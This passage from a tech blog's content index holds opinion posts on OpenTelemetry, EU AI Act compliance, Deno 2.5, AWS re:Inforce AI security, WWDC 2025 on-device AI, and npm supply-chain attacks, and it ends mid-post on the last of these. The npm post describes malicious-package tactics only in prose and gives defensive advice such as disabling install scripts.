Rather than asking you to replace your existing logging framework (nobody wants to rewrite every logger.info() call), it bridges your existing logging library — whether that\u0026rsquo;s SLF4J, Python\u0026rsquo;s logging module, or Winston in Node.js — into the OTel pipeline. You keep your familiar logging patterns while gaining OTel\u0026rsquo;s correlation and export capabilities.\nPractical Adoption Patterns # Having worked on several projects implementing OpenTelemetry over the past year, I\u0026rsquo;ve developed some opinions about what works and what doesn\u0026rsquo;t.\nStart with auto-instrumentation: Every major OTel SDK offers auto-instrumentation that hooks into common frameworks and libraries without code changes. For a typical web application, auto-instrumentation gives you HTTP request traces, database query spans, and outbound HTTP call spans essentially for free. Start here and add manual instrumentation for your business-critical code paths later.\nUse the OTel Collector: Don\u0026rsquo;t send telemetry directly from your application to your backend. Deploy the OTel Collector as an intermediary. It handles batching, retrying, and routing, and it lets you change backends without touching your application configuration. I\u0026rsquo;ve seen teams skip the Collector for simplicity and regret it when they need to add filtering, sampling, or a second backend destination.\nImplement tail-based sampling for traces: Head-based sampling (deciding whether to sample at the start of a trace) is simple but wasteful — you\u0026rsquo;ll miss interesting traces and capture boring ones. Tail-based sampling in the Collector lets you make sampling decisions after seeing the complete trace, keeping error traces and slow traces while dropping routine ones. 
This can reduce your storage costs by as much as 90% while keeping the data that actually matters.\nAdopt semantic conventions early: OpenTelemetry defines semantic conventions for common attributes like http.request.method (http.method in older releases), db.system, and rpc.service. Adopt these consistently from the start. Custom attributes are fine for domain-specific data, but inconsistent naming across services will make your observability data much harder to query.\nThe Vendor Landscape Responds # It\u0026rsquo;s been interesting watching observability vendors respond to OTel\u0026rsquo;s maturation. The smart ones — Honeycomb, Grafana Labs, Lightstep (now part of ServiceNow) — embraced OTel early and built their products around it. Others have been slower to adapt, maintaining proprietary agents while adding OTel compatibility as a secondary option.\nThe market dynamic is shifting. When your instrumentation is vendor-neutral, switching costs drop dramatically. Vendors need to compete on analysis capabilities, user experience, and pricing rather than lock-in. This is good for customers and, ultimately, good for the industry.\nMy Take # I\u0026rsquo;ve been following OpenTelemetry since the OpenTracing days, and I\u0026rsquo;ll admit there were moments when I wondered if the project would ever reach this point. The scope was ambitious, the governance was complex, and the pace of development sometimes felt glacial. But the approach of building a comprehensive, vendor-neutral standard — rather than shipping something quick and incomplete — has paid off.\nFor teams that haven\u0026rsquo;t adopted OpenTelemetry yet, now is the time. The \u0026ldquo;it\u0026rsquo;s not mature enough\u0026rdquo; objection is no longer valid. All three signals are GA. The auto-instrumentation libraries cover most common frameworks. The Collector is battle-tested. The ecosystem of compatible backends is broad. 
This is the kind of foundational infrastructure investment that platform teams should prioritize.\nIf you\u0026rsquo;re still using vendor-specific SDKs for your observability, start planning your migration. Not because your current vendor is bad, but because vendor-neutral instrumentation gives you options. And in infrastructure, having options is always better than the alternative.\nThe observability space has been waiting for a true standard for years. OpenTelemetry has delivered, and it\u0026rsquo;s time to build on that foundation.\n","date":"10 July 2025","externalUrl":null,"permalink":"/posts/250710-opentelemetry-full-maturity/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With OpenTelemetry’s logging signal reaching GA status, the project now covers all three pillars of observability with stable APIs, fulfilling a long-standing promise to the industry.","title":"OpenTelemetry Reaches Full Maturity — Observability Finally Has a Standard","type":"posts"},{"content":"The EU AI Act\u0026rsquo;s provisions on prohibited AI practices took effect earlier this year, and the next wave of requirements — covering high-risk AI systems — is now firmly on the horizon. If you\u0026rsquo;re a developer building AI-powered applications that serve European users, the compliance clock is ticking, and it\u0026rsquo;s time to think about what this means for your code, your architecture, and your development processes. This builds on regulatory approaches we\u0026rsquo;ve seen before, but with more comprehensive scope. This isn\u0026rsquo;t entirely new territory — the AI Act proposal has been evolving since 2021, giving regulators and industry time to shape the final framework.\nUnderstanding the Risk Categories # The AI Act categorizes AI systems into risk tiers, and this categorization has direct implications for how you build and deploy software. 
At the top are prohibited practices — things like social scoring systems, real-time remote biometric identification in public spaces (with narrow exceptions), and manipulative AI techniques. Most developers won\u0026rsquo;t encounter these, but it\u0026rsquo;s worth understanding the boundaries.\nThe category that will affect the most development teams is high-risk AI systems. This includes AI used in employment decisions, credit scoring, education assessment, critical infrastructure management, and law enforcement. If your AI system influences decisions in any of these domains, you\u0026rsquo;re subject to substantial requirements around documentation, testing, human oversight, and transparency.\nWhat catches many teams off guard is how broadly \u0026ldquo;high-risk\u0026rdquo; can be interpreted. A resume screening tool? High-risk. An AI-powered educational tutoring system that affects student assessments? Potentially high-risk. A predictive maintenance system for energy infrastructure? Potentially high-risk, if it acts as a safety component. The scope is wider than many developers initially assume.\nPractical Technical Requirements # Let me break down what the high-risk requirements mean in practice for a development team:\nTechnical documentation: You need comprehensive documentation of your training data, model architecture, training process, and evaluation metrics. This isn\u0026rsquo;t just a README — the Act expects documentation sufficient for a regulator to understand how your system works and why it makes the decisions it does. If you\u0026rsquo;re using fine-tuned foundation models, you need to document both the foundation model\u0026rsquo;s characteristics and your fine-tuning process.\nData governance: Training data must be \u0026ldquo;relevant, sufficiently representative, and to the best extent possible, free of errors and complete.\u0026rdquo; In practice, this means implementing data lineage tracking, bias auditing, and quality assurance processes for your training pipelines. 
If you\u0026rsquo;re using synthetic data, you need to document how it was generated and verify it doesn\u0026rsquo;t introduce systematic biases.\nLogging and monitoring: High-risk systems must maintain logs of their operation, with enough detail to enable post-hoc analysis of decisions. This has real architectural implications — you need to design your inference pipeline to capture inputs, outputs, confidence scores, and any intermediate reasoning steps in a way that\u0026rsquo;s auditable and tamper-resistant.\nHuman oversight: There must be mechanisms for human oversight, including the ability to override or halt the AI system. This means building admin interfaces, kill switches, and escalation pathways into your application architecture from the start, not bolting them on later.\nWhat This Means for Your Architecture # If I were designing a high-risk AI system today with EU AI Act compliance in mind, my architecture would look different from what most teams build. Here\u0026rsquo;s what I\u0026rsquo;d prioritize:\nObservability-first design: Every inference call gets logged with full context. I\u0026rsquo;d use OpenTelemetry to instrument the entire pipeline, from data ingestion through preprocessing, inference, and post-processing. These logs need to be immutable and retained for the periods specified in the Act.\nModel versioning and reproducibility: Every model version must be traceable back to its training data and configuration. Tools like MLflow or DVC aren\u0026rsquo;t optional luxuries — they\u0026rsquo;re compliance necessities. You need to be able to recreate any model version that was ever in production.\nBias testing as CI/CD: Fairness and bias evaluations should run as part of your continuous integration pipeline, not as quarterly manual reviews. Define your fairness metrics, write automated tests, and fail the build if they regress. This is the same principle we apply to performance testing — make it automated and continuous. 
AI-assisted testing approaches can help automate fairness validation workflows.\nCircuit breakers and human-in-the-loop: Design your system with the assumption that a human will sometimes need to intervene. That means building queuing systems for uncertain predictions, alerting for anomalous patterns, and administrative interfaces for review and override.\nThe General-Purpose AI Angle # For teams using foundation models through APIs — calling GPT, Claude, Gemini, or similar services — the Act places specific obligations on the providers of these \u0026ldquo;general-purpose AI models.\u0026rdquo; Providers must supply technical documentation, comply with copyright rules, and publish summaries of training data. Teams should understand general-purpose AI compliance obligations to properly allocate responsibility between provider and deployer.\nBut that doesn\u0026rsquo;t absolve you as the deployer. If you build a high-risk application on top of a general-purpose model, you\u0026rsquo;re still responsible for the application-level compliance requirements. The foundation model provider handles their obligations; you handle yours. Understanding this boundary is crucial for your compliance strategy. For teams building AI agents with autonomous capabilities, the compliance burden becomes even more complex — agents that take actions on your behalf require even stronger governance frameworks.\nSub-Hub: AI Regulation \u0026amp; Compliance Frameworks # For broader exploration of how regulation is shaping AI development, including GPAI compliance, agent governance, and building responsible systems by design, see AI Regulation \u0026amp; Compliance Frameworks — Building Responsible AI Systems. This sub-hub connects AI Act requirements to practical implementation patterns.\nMy Take # I\u0026rsquo;ll be honest: regulation often makes me nervous as a developer. 
Bureaucratic requirements can slow down innovation and create compliance theater that doesn\u0026rsquo;t actually improve outcomes. But having studied the AI Act in detail, I think the technical requirements are largely reasonable. Documentation, testing, monitoring, and human oversight aren\u0026rsquo;t bureaucratic overhead — they\u0026rsquo;re good engineering practices that too many AI teams skip in the rush to ship.\nThe teams that will struggle most are those that have been treating AI development like a prototyping exercise: minimal documentation, no version control for data or models, no systematic bias testing. The AI Act is essentially mandating the engineering rigor that should have been there all along. This discipline applies across the board — from AI-powered development tools that need transparency and auditability to backend inference systems. As AI agents become more autonomous, the compliance implications only deepen.\nMy advice: don\u0026rsquo;t wait for enforcement actions to start taking this seriously. Begin by auditing your existing AI systems against the risk categories. If anything falls into high-risk territory, start implementing the technical controls now. The compliance deadline will arrive faster than you think, and retrofitting compliance into an existing system is almost always more expensive than building it in from the start.\nTeams should also consider how security and supply chain best practices complement EU AI Act compliance — many of the same principles around auditability, reproducibility, and verification apply to both.\nThis is one of those areas where the developer landscape is shifting beneath our feet, and proactive preparation beats reactive scrambling every time. The broader AI governance landscape will be shaped by how teams navigate these compliance requirements. 
Compliance will increasingly be baked into development tooling and practices rather than left as an afterthought.\n","date":"3 July 2025","externalUrl":null,"permalink":"/posts/250703-eu-ai-act-developer-compliance/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With key EU AI Act provisions now in effect, development teams building AI systems need to understand the practical implications for their architectures and workflows.","title":"The EU AI Act Compliance Clock Is Ticking — What Developers Need to Know","type":"posts"},{"content":"Deno dropped version 2.5 this week, and while it might not have generated the same headlines as the original Deno 1.0 launch, this release represents something more important: the maturing of the JavaScript runtime ecosystem into a genuine multi-player market. After more than a decade of Node.js being the only game in town, we now have three serious contenders — and developers are the ones winning.\nWhat\u0026rsquo;s New in Deno 2.5 # The headline features center around improved Node.js compatibility and better monorepo support. Deno\u0026rsquo;s node: compatibility layer now covers over 95% of the Node.js standard library, which means most npm packages work without modification. The new workspace configuration options make it practical to use Deno in larger codebases that follow the monorepo pattern.\nBut the feature that caught my eye is the improved deno compile output. The ability to compile a Deno application into a single, self-contained binary has been available for a while, but the 2.5 release significantly reduces binary sizes and improves startup times. For those of us deploying JavaScript to edge environments or building CLI tools, this is a meaningful improvement.\nThe deno fmt and deno lint tools also received updates, with better support for the latest ECMAScript proposals and improved TypeScript handling. 
These built-in tools remain one of Deno\u0026rsquo;s strongest selling points — no more cobbling together ESLint, Prettier, and a dozen config files just to have a consistent development experience. This aligns with the broader trend toward unified, ergonomic developer tooling we\u0026rsquo;re seeing across programming ecosystems.\nThe Three-Runtime Reality # We\u0026rsquo;re now firmly in a world where Node.js, Deno, and Bun are all viable choices for JavaScript server-side development. The broader JavaScript runtime landscape, including Bun\u0026rsquo;s Rust rewrite, shows how the ecosystem is maturing. Each has carved out its own identity:\nNode.js remains the established choice with the largest ecosystem. The recent Node.js 22 LTS release is solid, and the runtime continues to modernize with better ESM support and the experimental permission model. If you\u0026rsquo;re building something that needs maximum library compatibility and you want the safest hiring choice, Node.js is still the answer.\nDeno positions itself as the \u0026ldquo;correct by default\u0026rdquo; option. Security permissions, TypeScript support, and built-in tooling all come out of the box. With the 2.x series focusing heavily on Node.js compatibility, Deno is increasingly viable for teams that want those developer experience benefits without sacrificing access to the npm ecosystem.\nBun is the performance-focused contender. Its bundler, test runner, and package manager are fast — genuinely, noticeably fast. For development workflows where iteration speed matters, Bun\u0026rsquo;s sub-second installs and hot reloading make a real difference. 
The focus on systems-level performance and broader developer tooling consolidation around speed-first approaches is becoming a defining characteristic of the newer JavaScript runtimes.\nWhat This Competition Means for Developers # I\u0026rsquo;ve been writing server-side JavaScript since the early Node.js days, back when we were all arguing about callback hell and whether promises were the answer. (They were, mostly.) What\u0026rsquo;s happening now with the runtime competition is something I haven\u0026rsquo;t seen before in the JavaScript ecosystem: genuine innovation driven by competition at the platform level.\nConsider what we\u0026rsquo;ve gained in the last two years:\nBuilt-in TypeScript support (Deno, Bun, and now experimentally in Node.js)\nNative test runners in all three runtimes\nPermission-based security models\nSingle-binary compilation\nDramatically faster package installation\nThese aren\u0026rsquo;t incremental improvements. They\u0026rsquo;re fundamental upgrades to the developer experience that would have taken much longer to materialize in a single-runtime world.\nPractical Considerations for Teams # If you\u0026rsquo;re leading a development team and wondering whether to stick with Node.js or explore alternatives, here\u0026rsquo;s my pragmatic take: it depends on your situation, and that\u0026rsquo;s not a cop-out answer.\nFor new greenfield projects with a small, adaptable team, Deno 2.5 is genuinely worth evaluating. The built-in tooling reduces your dependency footprint, the security model is sensible, and the Node.js compatibility means you\u0026rsquo;re not cut off from the npm ecosystem. Smaller dependency trees reduce your supply chain attack surface.\nFor existing Node.js codebases, the migration cost usually isn\u0026rsquo;t justified unless you\u0026rsquo;re hitting specific pain points that Deno or Bun solve. 
The JavaScript runtime is rarely the bottleneck in most applications — it\u0026rsquo;s usually database queries, network calls, or architectural decisions.\nFor edge and serverless deployments, Deno\u0026rsquo;s compile target and Bun\u0026rsquo;s startup performance make them compelling choices. When cold start times directly impact user experience and cost, the runtime choice matters more than in traditional server deployments.\nMy Take # I\u0026rsquo;ve been experimenting with Deno for side projects since the 2.0 release, and 2.5 feels like the version where it truly becomes a practical choice for production work. The Node.js compatibility story is good enough now that I\u0026rsquo;m not constantly hitting import errors or missing APIs.\nBut here\u0026rsquo;s what I think matters most: the competition itself. Node.js has improved faster in the last two years than in the preceding five, and that\u0026rsquo;s not a coincidence. This mirrors how AI system competition is driving innovation across the ecosystem, where multiple contenders push everyone toward better solutions. Ryan Dahl creating Deno and Jarred Sumner creating Bun didn\u0026rsquo;t just give us alternative runtimes — they gave the Node.js team motivation to ship features faster.\nWhatever runtime you choose, we\u0026rsquo;re in a better place than we were three years ago. The JavaScript server ecosystem is healthier for having genuine competition, and this week\u0026rsquo;s Deno release is another data point in that trend.\nIf you\u0026rsquo;re curious, I\u0026rsquo;d suggest spending a weekend porting a small project to Deno 2.5. 
You might be surprised at how smooth the experience has become.\n","date":"26 June 2025","externalUrl":null,"permalink":"/posts/250626-deno-25-javascript-runtime-wars/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Deno 2.5 brings improved Node.js compatibility and workspace support, signaling that the JavaScript runtime competition is driving real innovation.","title":"Deno 2.5 and the Maturing JavaScript Runtime Wars","type":"posts"},{"content":"AWS re:Inforce wrapped up this week in Philadelphia, and if there\u0026rsquo;s one theme that dominated the event, it\u0026rsquo;s this: securing AI workloads is no longer a niche concern — it\u0026rsquo;s the main event. After years of cloud security conferences focused on misconfigured S3 buckets and overly permissive IAM roles, we\u0026rsquo;re seeing a genuine shift in what \u0026ldquo;cloud security\u0026rdquo; means.\nThe AI Security Problem Space # What struck me most about the announcements was how AWS is acknowledging that AI workloads create fundamentally different security challenges. Traditional cloud security operates on well-understood primitives: who can access what resource, what network paths exist, what data is at rest versus in transit. AI workloads blur all of these boundaries. These concerns intersect directly with regulatory requirements like the EU AI Act compliance obligations that security teams now have to navigate.\nWhen you\u0026rsquo;re running inference endpoints, your model weights are intellectual property that needs protection. When you\u0026rsquo;re fine-tuning on customer data, you need isolation guarantees that go beyond standard VPC configurations. 
When you\u0026rsquo;re building RAG pipelines with foundation models, you\u0026rsquo;re creating new data flows that existing monitoring tools weren\u0026rsquo;t designed to track.\nAWS\u0026rsquo;s new Amazon Bedrock Guardrails enhancements address some of this. The ability to define content filtering policies, PII detection, and topic restrictions at the infrastructure level — rather than relying on application-layer implementations — is a meaningful improvement. I\u0026rsquo;ve seen too many teams cobble together prompt filtering with regex patterns and hope for the best.\nIdentity and Access for the Model Era # The expanded IAM controls for SageMaker and Bedrock are worth paying attention to. AWS introduced more granular permissions for model access, allowing organizations to control not just who can invoke a model, but which models they can invoke, with what parameters, and using what data sources.\nThis matters more than it might seem. In practice, I\u0026rsquo;ve worked with teams where developers had broad SageMaker permissions because \u0026ldquo;they need to experiment.\u0026rdquo; That\u0026rsquo;s fine until someone accidentally fine-tunes a foundation model on production customer data without proper data handling agreements in place. The new permission boundaries let you maintain developer velocity while putting guardrails (the organizational kind, not the Bedrock kind) around sensitive operations.\nThe integration with AWS Organizations and Service Control Policies means you can enforce these boundaries across an entire enterprise. For those of us managing multi-account AWS environments, this is a welcome addition to the policy toolkit.\nData Protection Gets Contextual # The announcement I found most interesting was the expansion of Amazon Macie to understand AI data flows. 
Macie has been solid for scanning S3 buckets for sensitive data, but the new capabilities extend that awareness to data moving through AI pipelines.\nThink about a typical RAG architecture: documents get ingested, chunked, embedded, and stored in a vector database. At each stage, sensitive data could be exposed in new ways. An embedding of a document containing PII is itself a form of that PII — it can potentially be reverse-engineered or used to infer the original content. Traditional DLP tools have no concept of this.\nHaving infrastructure-level visibility into these flows isn\u0026rsquo;t just a compliance checkbox. It\u0026rsquo;s a practical necessity for any organization dealing with regulated data that also wants to leverage AI capabilities. And that\u0026rsquo;s basically every enterprise I work with these days.\nThe Shared Responsibility Model, Revised # AWS also updated their shared responsibility model documentation to explicitly address AI workloads. This might sound like a minor documentation change, but it matters. The original shared responsibility model was elegantly simple: AWS secures the infrastructure, you secure what you put on it. With AI, the lines are blurrier.\nWho\u0026rsquo;s responsible for bias in a foundation model you access through Bedrock? What about prompt injection vulnerabilities in your application? What about data leakage through model outputs? The updated guidance provides clearer delineation, and while it predictably places most of the application-layer responsibility on customers, it at least gives security teams a framework for thinking about these questions.\nMy Take # I\u0026rsquo;ve been attending AWS security events since re:Invent started having dedicated security tracks, and this year\u0026rsquo;s re:Inforce felt like a genuine inflection point. 
The security industry has spent the last year hand-wringing about AI risks while mostly selling repackaged products with \u0026ldquo;AI\u0026rdquo; slapped on the marketing page. This parallels how broader platform security and compliance challenges require foundational infrastructure investments. AWS, to their credit, is building actual infrastructure-level security primitives. The same rigor that applies to supply chain security and systematic security practices should apply to AI infrastructure.\nThat said, I remain cautiously skeptical about how quickly organizations will adopt these tools. In my experience, security tooling adoption lags capability announcements by 18-24 months. Most teams are still catching up on basic cloud security hygiene — properly implementing least-privilege IAM, enabling CloudTrail everywhere, actually reading their GuardDuty findings.\nThe organizations that will benefit most from these AI security features are the ones that already have mature cloud security programs. 
For everyone else, these announcements are a useful signal of where the industry is headed, even if the immediate priority should still be locking down that public S3 bucket from 2019.\nCloud security continues to evolve, and this week reminded me that staying current isn\u0026rsquo;t optional — it\u0026rsquo;s table stakes.\n","date":"19 June 2025","externalUrl":null,"permalink":"/posts/250619-aws-reinforce-2025-ai-security/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"AWS re:Inforce 2025 puts AI workload security front and center, with new guardrails, identity controls, and data protection features that signal where cloud security is headed.","title":"AWS re:Inforce 2025 — Cloud Security Gets Serious About AI Workloads","type":"posts"},{"content":"Apple\u0026rsquo;s Worldwide Developers Conference kicked off this week in Cupertino, and while the consumer features will dominate the headlines, the developer implications of this year\u0026rsquo;s announcements are worth unpacking. Apple\u0026rsquo;s bet is becoming clearer with each passing year: while the rest of the industry races to build bigger cloud-hosted models, Apple is investing heavily in making AI capabilities run locally on device. As a developer who\u0026rsquo;s been building for Apple platforms on and off for over two decades, I find this both strategically brilliant and technically fascinating.\nApple Intelligence Gets Foundational APIs # Last year\u0026rsquo;s introduction of Apple Intelligence felt tentative — a set of user-facing features (writing tools, image generation, notification summaries) that developers couldn\u0026rsquo;t directly tap into. This year, Apple opened the floodgates. 
The new Foundation Models framework gives developers direct access to the on-device language model, with APIs for text generation, summarization, entity extraction, and semantic search.\nThe API design is classic Apple: opinionated, constrained, and focused on making the common case easy. You don\u0026rsquo;t get to fine-tune the model or adjust temperature parameters. Instead, you describe your task using structured schemas, and the framework handles model selection and optimization. It\u0026rsquo;s the opposite of the \u0026ldquo;here\u0026rsquo;s a raw model endpoint, good luck\u0026rdquo; approach that cloud-hosted foundation models typically offer.\nWhat impressed me most was the performance. The demos showed sub-second response times for tasks like document summarization and code explanation, running entirely on the Neural Engine without network connectivity. For applications where latency matters — and that\u0026rsquo;s most applications — this is a significant advantage over cloud-based alternatives. Small models optimized for edge deployment are becoming increasingly important.\nXcode Gets Smarter # The Xcode updates deserve attention. Apple has clearly been watching what AI coding tools like Cursor and GitHub Copilot are doing, and this year\u0026rsquo;s Xcode includes significantly upgraded AI assistance. Code completion is now powered by a larger on-device model that understands SwiftUI patterns and API conventions deeply. The new \u0026ldquo;Intelligent Refactoring\u0026rdquo; feature can restructure code across files while maintaining architectural consistency.\nBut the standout feature is the enhanced debugging assistant. Point it at a crash log or a failing test, and it provides not just explanations but suggested fixes with full context awareness. 
I\u0026rsquo;ve been using the beta for a few days, and while it\u0026rsquo;s not perfect, it\u0026rsquo;s caught issues that would have taken me significantly longer to track down manually.\nThe interesting constraint is that all of this runs locally. Apple isn\u0026rsquo;t sending your code to the cloud for analysis — a stance that resonates with enterprise developers who have legitimate concerns about code confidentiality. Whether Apple\u0026rsquo;s on-device models can match the capability of cloud-hosted alternatives is an open question, but for many development tasks, they\u0026rsquo;re already good enough.\nSwift and SwiftUI Evolution # Swift 6.2 brings several language improvements that developers have been requesting. Enhanced concurrency support makes structured concurrency patterns more ergonomic — the async/await story in Swift has improved dramatically over the past few versions, though it\u0026rsquo;s still more verbose than I\u0026rsquo;d like compared to Kotlin\u0026rsquo;s coroutines.\nSwiftUI continues its march toward feature parity with UIKit. The new layout system improvements and custom container APIs address some of the framework\u0026rsquo;s most persistent pain points. For the first time, I\u0026rsquo;d feel comfortable recommending SwiftUI as the primary UI framework for a complex production app without significant caveats. That\u0026rsquo;s a milestone worth noting.\nThe new Swift Testing framework is also maturing nicely. The macro-based approach to test declarations feels more natural than XCTest\u0026rsquo;s class-based model, and the integration with Xcode\u0026rsquo;s test navigator is seamless. Small quality-of-life improvements like this compound over time to make the development experience genuinely better.\nThe Privacy Angle # Apple\u0026rsquo;s commitment to on-device processing is partly a technical bet and partly a business strategy rooted in privacy as a differentiator. 
In a world where every AI interaction potentially sends sensitive data to a cloud provider, Apple\u0026rsquo;s approach offers a compelling alternative: AI capabilities with no data leaving the device. This privacy-first approach also aligns with emerging regulatory requirements like the EU AI Act, which emphasizes data minimization and user protection.\nThis has real implications for regulated industries. Healthcare apps that need AI features but can\u0026rsquo;t send patient data to third-party servers. Financial applications subject to data residency requirements. Enterprise tools handling confidential business information. For these use cases, on-device AI isn\u0026rsquo;t just a nice-to-have — it\u0026rsquo;s a requirement.\nThe tradeoff is capability. Apple\u0026rsquo;s on-device models are impressive for their size, but they can\u0026rsquo;t match the raw power of GPT-4 or Claude running on data center hardware. Apple\u0026rsquo;s answer is the hybrid approach introduced last year with Private Cloud Compute — when a task exceeds on-device capabilities, it can be routed to Apple\u0026rsquo;s secure cloud infrastructure, processed without Apple retaining the data, and results returned to the device. This year\u0026rsquo;s updates make this handoff more seamless and extend it to developer APIs.\nvisionOS and Spatial Computing # The visionOS 3 updates were less revolutionary than I expected. Apple is clearly still in the \u0026ldquo;build the foundation\u0026rdquo; phase for spatial computing. The improved hand tracking and eye tracking APIs are welcome, and the new collaboration features for shared spatial experiences open interesting possibilities. But the killer app for Vision Pro remains elusive.\nWhat I did find interesting was the convergence of AI and spatial computing. 
The new scene understanding APIs use on-device machine learning to identify objects and surfaces in the user\u0026rsquo;s environment with much higher fidelity than before. For augmented reality applications — which I still believe will be more impactful than fully immersive VR — this is important groundwork.\nMy Take # WWDC 2025 confirms Apple\u0026rsquo;s strategic direction: build the best on-device AI platform and let privacy be the differentiator. It\u0026rsquo;s a bet that requires continuous advances in model compression, hardware optimization, and silicon design — areas where Apple has demonstrated consistent excellence.\nFor developers, the message is clear: start building with on-device AI capabilities now. The Foundation Models framework lowers the barrier to entry significantly, and the performance characteristics make it viable for production applications. This contrasts with the broader ecosystem of cloud-hosted AI assistants that remain important for more complex tasks. If you\u0026rsquo;ve been waiting for Apple\u0026rsquo;s AI story to mature before investing in it, the wait is over.\nMy main concern is ecosystem fragmentation. Building for Apple\u0026rsquo;s AI APIs means building for Apple\u0026rsquo;s platforms only. The code won\u0026rsquo;t port to Android or the web. For cross-platform teams, this creates yet another platform-specific layer to manage. Apple has never been particularly concerned about cross-platform compatibility, and that\u0026rsquo;s unlikely to change.\nStill, for teams committed to the Apple ecosystem, this year\u0026rsquo;s WWDC delivered the tools and frameworks needed to build genuinely intelligent applications. 
The on-device approach may not be the loudest strategy in the AI race, but it might be the most sustainable.\n","date":"12 June 2025","externalUrl":null,"permalink":"/posts/250612-wwdc-2025-on-device-ai/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Apple’s WWDC 2025 reveals a clear strategy: make on-device AI the foundation of the platform, with major implications for developers.","title":"WWDC 2025 — Apple Doubles Down on On-Device AI","type":"posts"},{"content":"If you\u0026rsquo;ve been following security news this spring, you\u0026rsquo;ve seen the reports: another batch of malicious packages discovered on npm, another round of typosquatting attacks targeting popular libraries, another reminder that the JavaScript ecosystem\u0026rsquo;s greatest strength — its vast package registry — is also its most persistent vulnerability. This pattern echoes earlier major attacks and the broader supply chain security landscape that the industry continues to struggle with. As someone who\u0026rsquo;s been building Node.js applications since the early days, I find myself oscillating between frustration that we haven\u0026rsquo;t solved this and grudging acknowledgment that the problem is genuinely hard. This isn\u0026rsquo;t a new concern either — the npm ecosystem has faced supply chain challenges since GitHub\u0026rsquo;s acquisition.\nThe Latest Wave # The recent incidents follow a depressingly familiar pattern. Attackers publish packages with names similar to popular libraries — think react-dev-toolkit instead of legitimate development tools, or lodash-utils-v2 mimicking the ubiquitous utility library. These packages contain obfuscated code that exfiltrates environment variables, SSH keys, or cryptocurrency wallet credentials when installed.\nWhat\u0026rsquo;s changed in 2025 is the sophistication. 
Earlier typosquatting attacks were often crude — obvious obfuscation, immediate payload execution, easily detected by even basic security scanning. The latest generation is sneakier. Payloads that only activate in CI/CD environments. Code that waits days before phoning home. Packages that actually provide the functionality they claim to offer while silently siphoning data in the background. The attackers are learning from our defenses.\nThe numbers are sobering. npm hosts over 3 million packages. The registry sees millions of downloads per day. The npm security team and community researchers do heroic work identifying and removing malicious packages, but it\u0026rsquo;s an asymmetric fight — defenders need to catch everything; attackers only need one package to slip through.\nWhy JavaScript Is Uniquely Vulnerable # Every package ecosystem faces supply chain risks, but npm\u0026rsquo;s exposure is disproportionate for several structural reasons.\nDependency depth. The JavaScript ecosystem\u0026rsquo;s culture of small, single-purpose packages means that a typical Node.js project has hundreds or thousands of transitive dependencies. Each one is a potential attack vector. I just checked one of my production APIs — 847 packages in node_modules for what is, by any standard, a modest Express application. Every one of those packages is code I\u0026rsquo;m trusting to run in my production environment.\nInstall-time code execution. npm\u0026rsquo;s preinstall and postinstall scripts can execute arbitrary code the moment you run npm install. This is useful for native module compilation but catastrophic from a security perspective. The package doesn\u0026rsquo;t even need to be imported in your application code — installing it is enough to trigger the payload.\nNamespace squatting. Unlike some registries, npm doesn\u0026rsquo;t have strong namespace governance. Anyone can publish totally-legit-package-name and hope that someone typos their way into installing it. 
The scoped packages (@org/package) help, but most of the ecosystem\u0026rsquo;s popular packages predate scopes.\nRapid adoption culture. JavaScript developers are culturally inclined to reach for a package rather than implement functionality themselves. This isn\u0026rsquo;t inherently wrong — reuse is a core engineering principle — but it creates a trust surface that\u0026rsquo;s enormous and largely unverified.\nWhat\u0026rsquo;s Actually Being Done # Credit where it\u0026rsquo;s due: the ecosystem isn\u0026rsquo;t standing still. npm (now part of GitHub) has rolled out several security improvements over the past year.\nSocket has emerged as a significant player in the supply chain security space, offering real-time analysis of package behavior rather than just known vulnerability matching. Their approach — monitoring what packages actually do at install time and runtime — catches the kind of novel attacks that CVE databases miss.\nnpm\u0026rsquo;s provenance attestations, based on Sigstore, are gaining adoption. These align with broader supply chain security standards like SLSA, which provide frameworks for build integrity. They allow package maintainers to cryptographically prove that a published package was built from a specific commit in a specific repository. It doesn\u0026rsquo;t prevent all attacks, but it makes certain categories — compromised maintainer accounts, build system tampering — significantly harder.\nThe npm audit command continues to improve, and tools like Snyk and Dependabot help teams stay on top of known vulnerabilities. But these tools are largely reactive — they catch known-bad packages after they\u0026rsquo;ve been identified, not before they\u0026rsquo;ve been installed. 
Learning from xz Utils aftermath shows why proactive detection and architectural changes matter more than post-incident response.\nPractical Steps for Your Team # After years of dealing with this, here\u0026rsquo;s my pragmatic checklist for Node.js projects:\nUse lockfiles religiously. package-lock.json ensures reproducible installs and prevents silent dependency updates. Never deploy without one.\nAudit install scripts. Run npm install --ignore-scripts by default and explicitly whitelist packages that need install scripts. Yes, this breaks some workflows. That\u0026rsquo;s a feature, not a bug.\nPin dependencies. Use exact versions in package.json rather than semver ranges. The convenience of automatic minor updates isn\u0026rsquo;t worth the security risk.\nReview new dependencies. Before adding a package, check its download counts, maintenance activity, and — if possible — skim the source code. This doesn\u0026rsquo;t scale perfectly, but it catches the obvious stuff.\nMonitor with purpose. Use Socket, Snyk, or similar tools in your CI pipeline. Block deploys that introduce packages with suspicious behavior patterns.\nMinimize dependency depth. Sometimes the right answer is to write the 20 lines of code yourself instead of pulling in a package that brings 15 transitive dependencies. This principle also applies to Python tooling consolidation, where simpler dependency graphs are preferable to comprehensive tool ecosystems.\nMy Take # The npm supply chain problem is ultimately a governance and incentive problem. The registry is open by design — anyone can publish anything — and the cost of publishing malicious packages is near zero while the potential payoff is significant. Until that equation changes, we\u0026rsquo;re playing defense. 
